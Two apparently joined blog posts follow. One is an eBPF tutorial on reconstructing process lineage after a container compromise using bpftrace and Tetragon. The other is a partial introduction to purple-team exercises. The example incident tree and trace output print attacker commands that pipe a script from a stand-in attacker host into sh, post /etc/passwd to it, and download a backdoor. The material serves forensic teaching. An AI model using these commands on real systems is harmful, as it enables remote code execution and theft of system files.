Process Lineage — Reconstructing What Happened After the Fact

Reading Time: 9 minutes

eBPF: From Kernel to Cloud, Episode 13


Architecture Overview

eBPF Process Lineage — kernel-level process ancestry tracking for runtime security forensics
eBPF tracks every exec() and fork() in the kernel — reconstructing the full process tree for forensic attribution.

TL;DR

  • Process lineage with eBPF hooks fork and exec at the kernel level — building a tamper-resistant record of every process spawned, tied to its parent, pod, namespace, and timestamp
    (kprobe on fork/exec = an eBPF program that fires every time the kernel’s fork() or execve() path runs, capturing process name, PID, parent PID, and arguments inside the kernel, where a compromised userspace process cannot bypass the observer)
  • Application logs and container stdout can be deleted or suppressed by a compromised process; kernel-level process events written to a ringbuf and exported to a persistent store cannot
  • The kernel’s task_struct contains the complete process identity: PID, PPID, UID, GID, process name, capabilities, and cgroup (which maps directly to a pod)
  • Tetragon and Falco both build process lineage from kernel events; the difference is where the state lives: Tetragon keeps a kernel-side cache of process state in BPF maps, while Falco rebuilds its process table in userspace from the syscall event stream delivered by its kernel driver or eBPF probe
  • Reconstructing an incident from process lineage requires: who spawned the attacker’s process, what did it execute, what files did it open, what connections did it make — all correlated by PID and timestamp
  • Production caution: process events on a busy node can generate high ringbuf write volume; filter aggressively by namespace/cgroup at the eBPF level, not in userspace

EP12 showed how LSM hooks enforce at the syscall boundary — preventing operations before they complete. Process lineage with eBPF is the complementary capability: when an attacker bypasses enforcement, or when you need to understand what happened before the policy was in place, the kernel-level process record is how you reconstruct the attack chain. This episode covers how that record is built and how to read it.

Quick Check: What Process Events Is Your Cluster Already Recording?

# On any cluster node: verify exec tracing is available (the interval probe stops the trace after 10 seconds)
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("%-20s %-6d %s\n", comm, pid, str(args->filename));
}
interval:s:10 { exit(); }'

# Expected output (comm is the name of the calling process, before the exec completes):
# containerd-shim     1203   /usr/bin/runc
# runc                1204   /usr/sbin/runc
# sh                  1205   /bin/sh
# node                1842   /usr/local/bin/node
# kube-proxy          2091   /usr/local/bin/kube-proxy

# If Tetragon is installed: view the live process lineage stream
kubectl exec -n kube-system \
  $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -c tetragon -- tetra getevents --event-types PROCESS_EXEC | head -20

Sample Tetragon output:

{
  "process_exec": {
    "process": {
      "pid": 18293,
      "binary": "/bin/sh",
      "arguments": "-c health-check.sh",
      "start_time": "2026-04-22T09:14:03.412Z",
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"},
      "parent_pid": 18201
    },
    "parent": {
      "pid": 18201,
      "binary": "/usr/local/bin/my-app",
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"}
    }
  }
}

Each event has the process, its parent, the pod, the namespace, and the full binary path. That’s the raw material for process lineage reconstruction.

Not running Tetragon? Plain bpftrace on the node gives you the same raw data without Kubernetes enrichment — you get PIDs and process names but not pod names or namespaces without the /proc/<pid>/cgroup mapping step. For incident reconstruction, the Tetragon-enriched stream is significantly more useful because pod attribution is baked in at capture time, not reconstructed afterward.
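
The /proc/<pid>/cgroup mapping step mentioned above can be sketched in a few lines of Python. This is a minimal sketch, not how Tetragon does it: the function name pod_uid_from_cgroup and the sample paths are hypothetical, and it assumes the two common kubelet layouts (cgroupfs-style paths with dashes in the pod UID, systemd-style paths with underscores). Turning the UID into a pod name still requires a lookup against the Kubernetes API.

```python
import re
from typing import Optional

# Matches "pod<uid>" in cgroupfs-style and systemd-style cgroup paths.
# systemd-style paths replace the dashes in the UID with underscores.
_POD_UID = re.compile(
    r"pod([0-9a-fA-F]{8}[-_][0-9a-fA-F]{4}[-_][0-9a-fA-F]{4}"
    r"[-_][0-9a-fA-F]{4}[-_][0-9a-fA-F]{12})"
)


def pod_uid_from_cgroup(cgroup_text: str) -> Optional[str]:
    """Return the pod UID found in /proc/<pid>/cgroup content, or None."""
    match = _POD_UID.search(cgroup_text)
    if match is None:
        return None
    return match.group(1).replace("_", "-").lower()


# Hypothetical sample lines; the UID and container IDs are made up.
cgroupfs_line = "0::/kubepods/burstable/pod3f8a21bc-1c2d-4e5f-8a9b-0c1d2e3f4a5b/0123abcd"
systemd_line = (
    "0::/kubepods.slice/kubepods-burstable.slice/"
    "kubepods-burstable-pod3f8a21bc_1c2d_4e5f_8a9b_0c1d2e3f4a5b.slice/"
    "cri-containerd-0123abcd.scope"
)

print(pod_uid_from_cgroup(cgroupfs_line))
print(pod_uid_from_cgroup(systemd_line))
```

On a node you would feed it the contents of /proc/<pid>/cgroup for a PID taken from the bpftrace output. The process must still be alive for that file to exist, which is exactly why capture-time enrichment is more reliable for forensics.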


A container in the payments namespace was reported compromised. The security team’s automated response had already restarted the pod — the attacker’s process was gone. The container’s filesystem had been reset to the image. The application logs for that pod were deleted when the pod restarted. The Kubernetes event log showed the pod restart but nothing about what had run inside it.

Three questions, no answers yet:
1. What spawned the attacker’s process? (was it a remote code execution in the app, or a misconfigured exec?)
2. What did the attacker run after getting in? (what did they download, execute, touch?)
3. What network connections did they make? (where did data go, if anywhere?)

The answers were in Tetragon’s process event export — captured at the kernel level before the pod was restarted, stored in the observability backend, and queryable by pod name and time window. The kernel had seen every exec, every fork, every file open. The restart didn’t touch that record.

The lineage showed:

my-app (PID 18201)
  └── sh -c "curl http://attacker.com/payload.sh | sh"  (PID 18293)
        └── sh payload.sh  (PID 18294)
              ├── cat /etc/passwd  (PID 18295)
              ├── curl http://attacker.com/exfil -d @/etc/passwd  (PID 18296)
              ├── wget -O /tmp/.x http://attacker.com/backdoor  (PID 18297)
              └── chmod +x /tmp/.x  (PID 18298)

Five minutes of attacker activity, fully reconstructed, from a pod that no longer existed.


How the Kernel Tracks Process Identity

Every process in Linux is represented by a task_struct — the kernel’s internal data structure for a running process. It contains everything the kernel knows about that process.

task_struct — the kernel’s primary data structure for a process. Contains: PID, PPID, UID, GID, process name (comm, 15 chars), open file descriptors, memory mappings, namespace references, cgroup membership, capabilities, and a pointer to the parent task_struct. When bpftrace uses curtask, it’s returning a pointer to the current process’s task_struct. Reading curtask->real_parent->tgid gives you the parent’s PID — the foundation of process lineage.
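
Userspace sees a subset of these task_struct fields through /proc/<pid>/status. As a rough illustration of the identity fields involved, the sketch below parses that file format. The helper names parse_proc_status and identity are hypothetical, and the sample text is made up to match the PIDs used in this episode.

```python
def parse_proc_status(text: str) -> dict:
    """Parse the 'Key:<tab>value' lines of /proc/<pid>/status into a dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def identity(fields: dict) -> dict:
    """Pick the lineage-relevant fields.

    Tgid is what userspace calls the PID. The Uid and Gid lines list
    real, effective, saved, and filesystem IDs; the real ID is taken here.
    """
    return {
        "comm": fields["Name"],
        "pid": int(fields["Tgid"]),
        "ppid": int(fields["PPid"]),
        "uid": int(fields["Uid"].split()[0]),
        "gid": int(fields["Gid"].split()[0]),
    }


# Illustrative sample shaped like /proc/<pid>/status (values are made up).
sample = (
    "Name:\tsh\n"
    "State:\tS (sleeping)\n"
    "Tgid:\t18293\n"
    "Pid:\t18293\n"
    "PPid:\t18201\n"
    "Uid:\t1000\t1000\t1000\t1000\n"
    "Gid:\t1000\t1000\t1000\t1000\n"
)

print(identity(parse_proc_status(sample)))
```

On a Linux host, passing the contents of /proc/self/status to parse_proc_status gives the same fields for the running interpreter. The eBPF programs in this episode read the equivalent values straight from task_struct instead, so they do not depend on the process still existing when you look.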

When a process calls fork(), the kernel:
1. Allocates a new task_struct for the child
2. Copies the parent’s task_struct fields into the child
3. Sets the child’s real_parent pointer to the parent’s task_struct
4. Assigns the child a new PID
5. Returns the child’s PID to the parent, and 0 to the child

When the child calls execve(), the kernel:
1. Validates the binary (file permission and binary-format checks, LSM hooks)
2. Replaces the process’s memory image with the new binary
3. Updates task_struct->comm with the new process name
4. The PID does not change — execve replaces the process image but not the process identity

This fork-then-exec sequence is how every shell command works: the shell forks a child, the child execs the command. eBPF hooks on both events, correlated by PID and parent PID, give you the complete tree.
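
The claim that execve keeps the PID can be checked from userspace. The following is a small sketch, assuming a Linux host with /bin/sh available; the function name pid_survives_exec is made up for this example. It forks a child, replaces the child's image with a shell, and compares the PID returned by fork() with the PID the shell reports about itself.

```python
import os


def pid_survives_exec():
    """Fork a child, exec /bin/sh in it, and return
    (pid_returned_by_fork, pid_reported_after_exec)."""
    read_fd, write_fd = os.pipe()
    child_pid = os.fork()
    if child_pid == 0:
        # Child: fork() returned 0. Send stdout into the pipe, then
        # replace the process image. $$ expands to the shell's own PID.
        try:
            os.close(read_fd)
            os.dup2(write_fd, 1)
            os.execv("/bin/sh", ["sh", "-c", "echo $$"])
        finally:
            os._exit(127)  # only reached if execv failed
    # Parent: fork() returned the child's PID.
    os.close(write_fd)
    with os.fdopen(read_fd) as pipe:
        reported = int(pipe.read().strip())
    os.waitpid(child_pid, 0)
    return child_pid, reported


forked, after_exec = pid_survives_exec()
print(forked == after_exec)
```

The two values match because the shell is the same process the parent forked, only with a new memory image. That stable PID is what lets a fork event and a later exec event be joined into one node of the tree.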


Building the Process Tree with kprobes

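The two core hooks for process lineage, shown here as syscall tracepoints (kprobes on the corresponding kernel functions observe the same events, but tracepoints are the more stable interface across kernel versions):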

# Every fork: capture the parent/child relationship
# (clone also creates threads, and newer libcs may use clone3 or vfork instead)
bpftrace -e '
tracepoint:syscalls:sys_exit_clone {
    // Syscall tracepoints expose the return value as args->ret.
    // In the parent it is the child PID; in the child it is 0.
    if (args->ret > 0) {
        printf("FORK parent=%-6d child=%-6d parent_comm=%-20s\n",
               pid, args->ret, comm);
    }
}'

# Every exec: capture what binary replaced the process image
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("EXEC pid=%-6d ppid=%-6d binary=%-40s args=",
           pid,
           curtask->real_parent->tgid,
           str(args->filename));
    join(args->argv);   // prints the full argument list, then a newline
}'

Combined output (30 seconds, simplified):

FORK parent=18201 child=18293  parent_comm=my-app
EXEC pid=18293 ppid=18201 binary=/bin/sh              args=sh -c curl http://...
FORK parent=18293 child=18294  parent_comm=sh
EXEC pid=18294 ppid=18293 binary=/bin/sh              args=sh payload.sh
FORK parent=18294 child=18295  parent_comm=sh
EXEC pid=18295 ppid=18294 binary=/bin/cat             args=cat /etc/passwd
FORK parent=18294 child=18296  parent_comm=sh
EXEC pid=18296 ppid=18294 binary=/usr/bin/curl        args=curl http://attacker.com/exfil -d @/etc/passwd

Each line is a kernel event. The parent/child PID chain is the tree. Rendered:

my-app (18201)
  └── sh (18293) — "sh -c curl http://attacker.com/payload.sh | sh"
        └── sh (18294) — "sh payload.sh"
              ├── cat (18295) — "/etc/passwd"
              └── curl (18296) — "http://attacker.com/exfil -d @/etc/passwd"

This tree is constructed entirely from kernel events. No application logging. No container stdout. No agent inside the container.


How Tetragon Stores the Process Tree in BPF Maps

bpftrace’s approach above produces an event stream — a log you reconstruct manually. Tetragon takes a different approach: it maintains a live process tree in BPF maps, updated on every fork and exec event, persistently queryable.

Kernel events (kprobe on clone, execve, exit)
      ↓
Tetragon eBPF programs
      ↓
Write to BPF_MAP_TYPE_HASH: process_cache
      key: PID
      value: {binary, args, start_time, parent_pid, pod_name, namespace, uid, gid, caps}
      ↓
Tetragon userspace agent
      reads process_cache on events
      enriches with Kubernetes pod metadata (from informer cache)
      exports to gRPC stream → observability backend

task_struct in BPF maps: Tetragon doesn’t store the raw task_struct pointer in its maps (pointers are not stable across process lifetime). Instead, it stores a snapshot of the relevant fields (PID, binary path, arguments, capabilities, cgroup path, start time) at the moment of the exec event, keyed by PID. When the process exits, the entry is kept in the cache for a configurable window to allow late-arriving events (like file closes or connection terminations) to be correlated back to the originating process. Map names and layouts differ between Tetragon versions: in the upstream source the kernel-side map is named execve_map and the pod-enriched process cache is held by the userspace agent, so treat the process_cache name and fields shown here as illustrative.
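
The retention behaviour described above (keep the snapshot for a while after exit so late events still resolve) can be modelled in userspace. This is a toy sketch of the idea only, not Tetragon's implementation: the ProcessCache class, its method names, and the 30-second default are all assumptions made for illustration.

```python
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class ProcessSnapshot:
    pid: int
    ppid: int
    binary: str
    start_time: float
    exit_time: Optional[float] = None  # None while the process is alive


class ProcessCache:
    """PID-keyed cache that keeps exited entries for a grace window."""

    def __init__(self, grace_seconds: float = 30.0):  # hypothetical default
        self.grace_seconds = grace_seconds
        self._entries: Dict[int, ProcessSnapshot] = {}

    def on_exec(self, pid: int, ppid: int, binary: str, now: float) -> None:
        # Snapshot the fields at exec time instead of holding a pointer.
        self._entries[pid] = ProcessSnapshot(pid, ppid, binary, start_time=now)

    def on_exit(self, pid: int, now: float) -> None:
        entry = self._entries.get(pid)
        if entry is not None:
            entry.exit_time = now  # mark as exited, but keep the entry

    def lookup(self, pid: int, now: float) -> Optional[ProcessSnapshot]:
        self._evict(now)
        return self._entries.get(pid)

    def _evict(self, now: float) -> None:
        expired = [
            pid for pid, e in self._entries.items()
            if e.exit_time is not None and now - e.exit_time > self.grace_seconds
        ]
        for pid in expired:
            del self._entries[pid]


cache = ProcessCache(grace_seconds=30.0)
cache.on_exec(18296, 18294, "/usr/bin/curl", now=100.0)
cache.on_exit(18296, now=101.0)
print(cache.lookup(18296, now=120.0))  # still resolvable inside the window
print(cache.lookup(18296, now=200.0))  # evicted after the window
```

The design trade-off is memory against correlation quality: a longer window resolves more late events but holds more dead entries, which matters on nodes with high process churn.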

To inspect Tetragon’s process cache directly:

# Find the Tetragon process map (the name varies by version; upstream source uses execve_map)
bpftool map list | grep -E 'process_cache|execve_map'

# 112: hash  name process_cache  flags 0x0
#      key 4B  value 256B  max_entries 65536  memlock 16777216B

# Dump a few entries
bpftool map dump id 112 | head -60

# [{
#     "key": 18293,                           # ← PID
#     "value": {
#         "binary": "/bin/sh",
#         "args": "sh -c curl http://...",
#         "pid": 18293,
#         "ppid": 18201,
#         "uid": 1000,
#         "start_time": 1745296443,
#         "cgroup": "kubepods/burstable/pod3f8a21bc/.../payments"
#     }
# }]

The cgroup field maps directly to the pod — same path as /proc/<pid>/cgroup but captured at exec time and stored in kernel space.


Correlating Files and Connections to the Process Tree

Process lineage is most useful when combined with the file access and network connection events from the same process. Tetragon’s TracingPolicy supports this multi-event correlation natively:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: observe-process-lineage
spec:
  kprobes:
    - call: "security_inode_permission"
      syscall: false
      args:
        - index: 0
          type: "inode"
      selectors:
        - matchNamespaces:
            - namespace: Net
              operator: "NotIn"
              values: ["host_ns"]    # exclude the host network namespace
          matchActions:
            - action: Post   # audit: log but don't block
    - call: "tcp_connect"
      syscall: false
      args:
        - index: 0
          type: "sock"
      selectors:
        - matchActions:
            - action: Post

With this policy active, Tetragon emits events for both file access and TCP connections, each carrying the full process context (PID, binary, pod, parent). Correlated by PID and timestamp:

tetra getevents | jq 'select(.process_kprobe.function_name == "tcp_connect") |
  {pid: .process_kprobe.process.pid,
   binary: .process_kprobe.process.binary,
   pod: .process_kprobe.process.pod.name,
   dst: .process_kprobe.args[0].sock_arg.daddr}'

Sample output:

{"pid": 18296, "binary": "/usr/bin/curl", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}
{"pid": 18297, "binary": "/usr/bin/wget", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}

PID 18296 and 18297 both connected to the same IP. Cross-reference with the process tree: those are the curl and wget spawned by the attacker’s payload script. The destination IP is the attacker’s infrastructure. The timeline is milliseconds-precise because the events are timestamped by the kernel at the hook point.
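
The cross-reference step can be automated once the process table is available. Below is a minimal sketch that attaches the ancestor chain to each connection event. The PROCESSES table is typed in by hand from the lineage shown earlier, and the ancestry helper is a hypothetical name; a real pipeline would fill the table from exec events.

```python
import json

# child PID -> (parent PID, binary), copied from the lineage in this episode
PROCESSES = {
    18201: (None, "/usr/local/bin/my-app"),
    18293: (18201, "/bin/sh"),
    18294: (18293, "/bin/sh"),
    18296: (18294, "/usr/bin/curl"),
    18297: (18294, "/usr/bin/wget"),
}


def ancestry(pid, processes):
    """Walk parent links from pid to the root; return labels root-first."""
    chain = []
    seen = set()  # guards against loops in malformed data
    while pid is not None and pid in processes and pid not in seen:
        seen.add(pid)
        parent, binary = processes[pid]
        chain.append(f"{binary}({pid})")
        pid = parent
    return list(reversed(chain))


connect_events = [
    '{"pid": 18296, "binary": "/usr/bin/curl", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}',
    '{"pid": 18297, "binary": "/usr/bin/wget", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}',
]

for line in connect_events:
    event = json.loads(line)
    print(event["dst"], "<-", " > ".join(ancestry(event["pid"], PROCESSES)))
```

Each connection now carries the path back to my-app, which answers the first incident question (what spawned the process that made this connection) without manual lookup.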


Building Process Lineage Without Tetragon

If you’re not running Tetragon, you can build a basic process lineage recorder with bpftrace that writes to a file:

# Record all exec events to a file — run in the background on the node
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("%llu EXEC pid=%-6d ppid=%-6d binary=%s\n",
           nsecs, pid, curtask->real_parent->tgid, str(args->filename));
}
tracepoint:sched:sched_process_exit {
    printf("%llu EXIT pid=%-6d comm=%s\n", nsecs, pid, comm);
}
' > /var/log/process-lineage.log &

# Tail the log for real-time observation
tail -f /var/log/process-lineage.log

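Sample output (timestamps shown as epoch nanoseconds for readability; the raw nsecs value counts nanoseconds since boot, so it is reliable for ordering but needs the boot time added to become wall-clock time):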

1745296443123456789 EXEC pid=18293 ppid=18201 binary=/bin/sh
1745296443234567890 EXEC pid=18294 ppid=18293 binary=/bin/sh
1745296443345678901 EXEC pid=18295 ppid=18294 binary=/bin/cat
1745296443456789012 EXIT pid=18295 comm=cat
1745296443567890123 EXEC pid=18296 ppid=18294 binary=/usr/bin/curl
1745296443678901234 EXIT pid=18293 comm=sh

This file survives pod restarts because it’s on the node, not in the container. After the pod is restarted, the process lineage record is still on disk. You reconstruct the tree by grouping by ppid and ordering by timestamp.
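
Grouping by ppid and ordering by timestamp is mechanical enough to script. The sketch below assumes the log format produced by the bpftrace recorder above; build_tree and render are hypothetical helper names. It ignores PID reuse, so on a long-running log you would also need to split entries by start time.

```python
import re
from collections import defaultdict

EXEC_LINE = re.compile(r"^(\d+) EXEC pid=(\d+)\s+ppid=(\d+)\s+binary=(\S+)")


def build_tree(log_text):
    """Return (children, binaries): ppid -> child PIDs in time order,
    and pid -> most recently executed binary."""
    events = []
    for line in log_text.splitlines():
        m = EXEC_LINE.match(line)
        if m:
            ts, pid, ppid, binary = m.groups()
            events.append((int(ts), int(pid), int(ppid), binary))
    events.sort()  # order by timestamp
    children = defaultdict(list)
    binaries = {}
    for _, pid, ppid, binary in events:
        if pid not in binaries:
            children[ppid].append(pid)
        binaries[pid] = binary  # a later exec in the same PID replaces the image
    return children, binaries


def render(pid, children, binaries, depth=0):
    """Return the subtree under pid as indented text lines."""
    lines = [f"{'  ' * depth}{binaries.get(pid, '?')} ({pid})"]
    for child in children.get(pid, []):
        lines.extend(render(child, children, binaries, depth + 1))
    return lines


LOG = """\
1745296443123456789 EXEC pid=18293 ppid=18201 binary=/bin/sh
1745296443234567890 EXEC pid=18294 ppid=18293 binary=/bin/sh
1745296443345678901 EXEC pid=18295 ppid=18294 binary=/bin/cat
1745296443456789012 EXIT pid=18295 comm=cat
1745296443567890123 EXEC pid=18296 ppid=18294 binary=/usr/bin/curl
1745296443678901234 EXIT pid=18293 comm=sh
"""

children, binaries = build_tree(LOG)
print("\n".join(render(18201, children, binaries)))
```

The root prints as "?" because the log window contains no exec event for PID 18201; the recorder only sees processes that exec after it starts.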


⚠ Production Gotchas

Ringbuf saturation on high-process-churn nodes. Nodes running serverless workloads or short-lived batch jobs may spawn thousands of processes per minute. Hooking exec on every process at that rate generates a high ringbuf write volume. Filter at the eBPF level by cgroup (namespace) rather than in userspace — sending events to userspace only to discard them wastes ringbuf space and CPU. Tetragon’s namespace selector does this filtering in the eBPF program before the write.

The 15-character comm truncation. The comm field in task_struct is limited to 15 characters (plus null terminator). Process names longer than 15 characters are truncated. bpftrace’s comm built-in has the same limit. For the full binary path, read from execve’s filename argument at the tracepoint, not from comm.

PID reuse. Linux PIDs are reused after a process exits. In a high-churn environment, a PID you recorded as an attacker process may be reassigned to a legitimate process seconds later. Always pair PIDs with start time and cgroup path when correlating across events. Tetragon’s process cache keys on PID + start time to handle this.
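
One way to apply the PID-plus-start-time rule when correlating events yourself is to keep every start time seen for a PID and resolve each event to the latest start at or before the event timestamp. This is a simplified sketch under that assumption: the Incarnations class is a made-up name, the binaries and times are invented, and it does not check exit times.

```python
from bisect import bisect_right, insort


class Incarnations:
    """Map a reused PID to the right process by (pid, start_time)."""

    def __init__(self):
        self._starts = {}  # pid -> sorted list of start times
        self._binary = {}  # (pid, start_time) -> binary

    def record_start(self, pid, start_time, binary):
        insort(self._starts.setdefault(pid, []), start_time)
        self._binary[(pid, start_time)] = binary

    def resolve(self, pid, event_time):
        """Return ((pid, start_time), binary) for the process that owned
        the PID at event_time, or None if no start precedes the event."""
        starts = self._starts.get(pid, [])
        idx = bisect_right(starts, event_time) - 1
        if idx < 0:
            return None
        key = (pid, starts[idx])
        return key, self._binary[key]


inc = Incarnations()
inc.record_start(18296, 100, "/usr/bin/curl")    # attacker process
inc.record_start(18296, 500, "/usr/sbin/nginx")  # same PID, reused later
print(inc.resolve(18296, 150))
print(inc.resolve(18296, 600))
```

Without the start time, a connection logged at time 600 would be attributed to the attacker's curl even though that process was long gone.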

Exec chains lose argument history. When execve replaces the process image, task_struct->comm changes but the PID does not. If the attacker’s shell runs exec bash to replace itself with a less suspicious binary name, the exec event captures the new binary — but the PID lineage still shows the parent correctly. Don’t rely on comm alone for process identity; always track the binary path from the exec event.

Process events don’t capture file content. You see that /bin/cat /etc/passwd ran. You don’t see what was in /etc/passwd at that moment unless you also capture file open/read events. Tetragon’s security_inode_permission hook tells you which files were accessed; capturing their content requires additional hooks on vfs_read with buffer capture, which is significantly higher overhead and requires careful data handling for sensitive files.


Quick Reference

What you want               Command
--------------------------  ------------------------------------------------------------------
Live exec trace (bpftrace)  bpftrace -e 'tracepoint:syscalls:sys_enter_execve { printf(...) }'
Fork + exec tree            Combine sys_exit_clone + sys_enter_execve traces, correlate by pid/ppid
Tetragon process events     tetra getevents --event-types PROCESS_EXEC
Tetragon file + network     tetra getevents --event-types PROCESS_KPROBE
Process cache map           bpftool map list | grep process_cache; bpftool map dump id N
Map PID to pod              cat /proc/<pid>/cgroup → extract pod UID
Process exit events         tracepoint:sched:sched_process_exit

Process event               Kernel hook
--------------------------  ------------------------------------------------------------------
New process spawned         tracepoint:syscalls:sys_exit_clone (return value > 0 = child PID)
Binary executed             tracepoint:syscalls:sys_enter_execve
Process exited              tracepoint:sched:sched_process_exit
File opened                 tracepoint:syscalls:sys_enter_openat
Network connect             kprobe:tcp_connect
DNS query                   tracepoint:syscalls:sys_enter_sendto (port 53)

Key Takeaways

  • Process lineage with eBPF hooks fork and exec at the kernel level — every process spawned on a node is recorded with its parent PID, binary path, arguments, and container context, regardless of what the container does to suppress application logs
  • The kernel’s task_struct is the authoritative source of process identity; eBPF programs read it at hook time and snapshot the relevant fields into BPF maps before the process can exit or be killed
  • Tetragon maintains a live process tree in BPF maps, correlates it with Kubernetes metadata, and makes it queryable by pod/namespace — the record persists after the pod is restarted
  • Incident reconstruction requires correlating process lineage with file access events and network connection events, all correlated by PID and timestamp — eBPF provides all three event streams from the same kernel attachment mechanism
  • PID reuse is a real concern in high-churn environments; always pair PIDs with start time and cgroup path when correlating across events
  • Kernel-level process events cannot be suppressed by a compromised container process — an attacker with root inside the container still cannot prevent bpftrace or Tetragon running on the host from recording their syscalls

What’s Next

EP14 is the payoff episode for the entire series arc so far. You’ve seen programs load (EP04), maps hold state (EP05), CO-RE keep programs portable (EP06), XDP and TC enforce at the network layer (EP07, EP08), bpftrace ask one-off questions (EP09), and the observability stack collect flow, DNS, and process data continuously (EP10, EP11, EP12, EP13).

EP14 synthesises all of it into four commands that tell you everything about any cluster you’ve never seen before — any eBPF-based tool, any vendor, any configuration. The audit playbook is what you run in the first 10 minutes when you inherit a cluster and need to understand what’s enforcing policy at the kernel level before you can trust anything it tells you.

Next: the audit playbook — four commands to see any cluster


What Is Purple Team Security: Red + Blue = Better Defense

Reading Time: 8 minutes



TL;DR

  • Purple team security is the practice of combining offensive (red) and defensive (blue) work in the same exercise — attackers simulate real techniques while defenders tune detection in real time
  • Traditional red team engagements produce a report; purple team produces a faster MTTD (mean time to detect)
  • The structural output is not a findings list — it’s updated detection rules, tested playbooks, and a measured detection baseline
  • Purple team is not a permanent headcount; it is a cadence of exercises run against your own infrastructure
  • Every episode in this series follows the red-blue-purple model: attack simulation → detection → structural fix

OWASP Mapping: This episode establishes the series methodology. No single OWASP category. Subsequent episodes map directly to A01 through A10.


The Big Picture

┌─────────────────────────────────────────────────────────────────┐
│                    PURPLE TEAM MODEL                            │
│                                                                 │
│   RED TEAM                    BLUE TEAM                         │
│   (Offensive)                 (Defensive)                       │
│                                                                 │
│   ┌──────────┐               ┌──────────┐                       │
│   │ Simulate │──── attack ──▶│  Detect  │                       │
│   │ attack   │               │  alert   │                       │
│   └──────────┘               └──────────┘                       │
│         │                          │                            │
│         └──────────┬───────────────┘                            │
│                    │                                            │
│              ┌─────▼──────┐                                     │
│              │  DEBRIEF   │  ← The purple layer                 │
│              │ What fired?│                                     │
│              │ What didn't│                                     │
│              │ Why?       │                                     │
│              └─────┬──────┘                                     │
│                    │                                            │
│         ┌──────────▼──────────┐                                 │
│         │  Updated detection  │                                 │
│         │  rules + playbooks  │                                 │
│         └─────────────────────┘                                 │
│                                                                 │
│   OUTCOME: Detection time drops exercise-over-exercise          │
└─────────────────────────────────────────────────────────────────┘

What is purple team security? It is the structured practice of attacking your own infrastructure — with full visibility on both sides — so that detection logic improves after every exercise, not just after a real breach.


Why Red vs. Blue Alone Fails

Eleven days.

That was how long an attacker had access before my blue team detected the compromise in a red team engagement I ran two years ago. It was a standard authorized engagement — well-scoped, realistic techniques, no shortcuts. The red team was good. The blue team was experienced. And still: eleven days.

The debrief was the turning point. The red team had used techniques that generated logs — CloudTrail entries, VPC Flow Log anomalies, process spawn events. The blue team had the data. The detections just weren’t tuned for these specific patterns. Nobody had ever run the techniques against this specific environment and verified whether the alerts fired.

We restructured the next exercise as a purple team exercise. Same attacker techniques. But this time, the blue team was in the room with the red team. They watched each technique execute in real time. They checked whether the alert fired. When it didn’t, they wrote the detection rule on the spot and verified it before moving to the next technique.

Detection time in the following exercise: four hours.

That is the entire argument for purple team security. Not philosophy. Not org charts. Eleven days versus four hours.


What Red Team Alone Gets Wrong

Traditional red team engagements produce a report with findings. The findings describe what the attacker did. The recommendations describe what to fix. Then the report goes to a remediation queue, the org closes the tickets over three months, and the detection logic is never tested.

The fundamental problem: a red team report tells you what happened; it doesn’t tell you whether your detection would catch it happening again.

The MITRE ATT&CK framework lists hundreds of techniques and sub-techniques. An annual red team engagement tests maybe 20 of them against your environment. You get a PDF. You don’t get a detection baseline.

Red team alone also creates adversarial dynamics inside the organization. Red team wins when they’re not caught. Blue team wins when they catch everything. These goals are structurally opposed, which means neither team has an incentive to share information that would help the other.


What Blue Team Alone Gets Wrong

Blue team without red team input is writing detection rules in the abstract. They tune alerts based on what they think an attacker would do, not what an attacker actually does against your specific environment with your specific tooling.

Signature-based detection catches known-bad. Behavioral detection catches anomalies. Neither catches a sophisticated attacker who has studied your baseline — unless you’ve explicitly tested whether the behavior that attacker uses registers as an anomaly in your environment.

Blue teams also tend toward alert fatigue. When everything fires, nothing gets investigated. Tuning requires knowing which signals correspond to real techniques, and that knowledge only comes from running the techniques.


The Purple Team Model: How It Actually Works

Purple team security is not a permanent team structure. You don’t hire a purple team. You run purple team exercises.

The exercise structure:

1. SCOPE          — agree on the attack scenario (e.g., "compromised developer credentials")
2. RED EXECUTES   — red team runs the first technique in the scenario
3. BLUE OBSERVES  — blue team watches for the alert; records: fired / not fired / noisy
4. DEBRIEF        — immediate, technique by technique. Why didn't it fire? What data existed?
5. TUNE           — blue team updates detection rule. Red team re-runs. Verify it fires.
6. NEXT TECHNIQUE — repeat for every technique in the scenario
7. MEASURE        — record detection rate and detection time at the end of the exercise

The output of a purple team exercise is not a PDF. It is:
  • Updated detection rules (tested and verified)
  • A measured detection time for each technique
  • A documented attack scenario with the specific commands used
  • A baseline for the next exercise to beat
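
The MEASURE step can be as simple as a small record per technique. Here is a minimal sketch of one way to keep it; the TechniqueResult fields, the summarize helper, and all timings are assumptions for illustration, with times expressed as seconds from the start of the exercise.

```python
from dataclasses import dataclass
from statistics import mean
from typing import List, Optional


@dataclass
class TechniqueResult:
    technique_id: str
    executed_at: float            # seconds since exercise start
    detected_at: Optional[float]  # None means the alert never fired


def summarize(results: List[TechniqueResult]) -> dict:
    """Compute detection rate and mean time to detect for one exercise."""
    detected = [r for r in results if r.detected_at is not None]
    rate = len(detected) / len(results) if results else 0.0
    mttd = mean(r.detected_at - r.executed_at for r in detected) if detected else None
    return {
        "detection_rate": rate,
        "mean_time_to_detect_s": mttd,
        "not_detected": [r.technique_id for r in results if r.detected_at is None],
    }


# Made-up results for a three-technique exercise.
results = [
    TechniqueResult("T1078", executed_at=0, detected_at=120),
    TechniqueResult("T1530", executed_at=600, detected_at=None),
    TechniqueResult("T1098", executed_at=1200, detected_at=1260),
]

print(summarize(results))
```

Storing these records in version control alongside the detection rules gives the next exercise a concrete number to beat, and the not_detected list becomes the tuning backlog.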

This is what “purple” means: the red and blue work together, in the same room or on the same call, producing improved defense as a direct output of the attack simulation.


The MITRE ATT&CK Scaffolding

